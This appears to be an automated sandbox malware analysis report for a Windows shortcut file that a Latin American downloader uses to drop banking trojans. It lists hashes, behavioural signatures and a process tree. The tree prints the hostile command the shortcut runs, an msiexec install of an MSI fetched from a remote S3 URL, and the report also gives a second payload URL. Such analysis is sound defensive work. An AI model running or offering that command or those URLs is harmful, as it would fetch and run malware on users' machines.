Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
16/11/2021, 19:18
Static task
static1
Behavioral task
behavioral1
Sample
BoIetos - 16-11.lnk
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
BoIetos - 16-11.lnk
Resource
win10-en-20211104
General
-
Target
BoIetos - 16-11.lnk
-
Size
1KB
-
MD5
679deb658850ade14d991d11fc17fd79
-
SHA1
9ba091d7556fbc8b2c254452344b4c4b2353fbad
-
SHA256
c4919fddd43c203fef53a99e165c08dd26cc595693d293af25c11d21baec49de
-
SHA512
71dfb75bef210abe99af5390ca3748b637dc0310ff2d7a68cf04ff2c80523a293d9d951457cfd37a6ffbba95d5cca27c6bd51c54042bba53df5f9bc25e193089
Malware Config
Extracted
latam_generic_downloader
http://ec2-52-53-236-128.us-west-1.compute.amazonaws.com/softcom.base
Signatures
-
Generic LATAM Downloader
Generic Latin American MSI downloader used to drop various banking trojans.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 13 3884 msiexec.exe 23 4368 MsiExec.exe -
Loads dropped DLL 2 IoCs
pid Process 4368 MsiExec.exe 4368 MsiExec.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 3884 msiexec.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI9348.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI97AE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI905A.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeShutdownPrivilege 3884 msiexec.exe Token: SeIncreaseQuotaPrivilege 3884 msiexec.exe Token: SeRestorePrivilege 3884 msiexec.exe Token: SeTakeOwnershipPrivilege 3884 msiexec.exe Token: SeSecurityPrivilege 4424 msiexec.exe Token: SeCreateTokenPrivilege 3884 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3884 msiexec.exe Token: SeLockMemoryPrivilege 3884 msiexec.exe Token: SeIncreaseQuotaPrivilege 3884 msiexec.exe Token: SeMachineAccountPrivilege 3884 msiexec.exe Token: SeTcbPrivilege 3884 msiexec.exe Token: SeSecurityPrivilege 3884 msiexec.exe Token: SeTakeOwnershipPrivilege 3884 msiexec.exe Token: SeLoadDriverPrivilege 3884 msiexec.exe Token: SeSystemProfilePrivilege 3884 msiexec.exe Token: SeSystemtimePrivilege 3884 msiexec.exe Token: SeProfSingleProcessPrivilege 3884 msiexec.exe Token: SeIncBasePriorityPrivilege 3884 msiexec.exe Token: SeCreatePagefilePrivilege 3884 msiexec.exe Token: SeCreatePermanentPrivilege 3884 msiexec.exe Token: SeBackupPrivilege 3884 msiexec.exe Token: SeRestorePrivilege 3884 msiexec.exe Token: SeShutdownPrivilege 3884 msiexec.exe Token: SeDebugPrivilege 3884 msiexec.exe Token: SeAuditPrivilege 3884 msiexec.exe Token: SeSystemEnvironmentPrivilege 3884 msiexec.exe Token: SeChangeNotifyPrivilege 3884 msiexec.exe Token: SeRemoteShutdownPrivilege 3884 msiexec.exe Token: SeUndockPrivilege 3884 msiexec.exe Token: SeSyncAgentPrivilege 3884 msiexec.exe Token: SeEnableDelegationPrivilege 3884 msiexec.exe Token: SeManageVolumePrivilege 3884 msiexec.exe Token: SeImpersonatePrivilege 3884 msiexec.exe Token: SeCreateGlobalPrivilege 3884 msiexec.exe Token: SeRestorePrivilege 4424 msiexec.exe Token: SeTakeOwnershipPrivilege 4424 msiexec.exe Token: SeRestorePrivilege 4424 msiexec.exe Token: SeTakeOwnershipPrivilege 4424 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3884 msiexec.exe 3884 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3568 wrote to memory of 3884 3568 cmd.exe 69 PID 3568 wrote to memory of 3884 3568 cmd.exe 69 PID 4424 wrote to memory of 4368 4424 msiexec.exe 72 PID 4424 wrote to memory of 4368 4424 msiexec.exe 72 PID 4424 wrote to memory of 4368 4424 msiexec.exe 72
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\BoIetos - 16-11.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "https://yd2.s3.eu-central-1.amazonaws.com/lnstaIIog.msi"2⤵
- Blocklisted process makes network request
- Use of msiexec (install) with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3884
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1742C18EA2E86C52E07F078B2550C832⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4368
-